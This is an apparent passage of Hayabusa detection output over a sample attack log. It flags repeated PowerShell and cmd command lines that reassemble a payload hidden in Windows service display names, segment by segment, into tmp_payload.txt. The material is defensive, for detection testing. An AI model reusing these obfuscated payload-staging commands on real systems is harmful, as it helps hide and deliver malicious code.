+00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.100 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.116 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.116 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.064 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.064 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.968 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.984 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.984 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.421 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.437 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.872 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.884 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.884 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.322 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.338 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.338 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.756 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.772 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.122 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.138 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.138 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.532 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.547 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.547 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 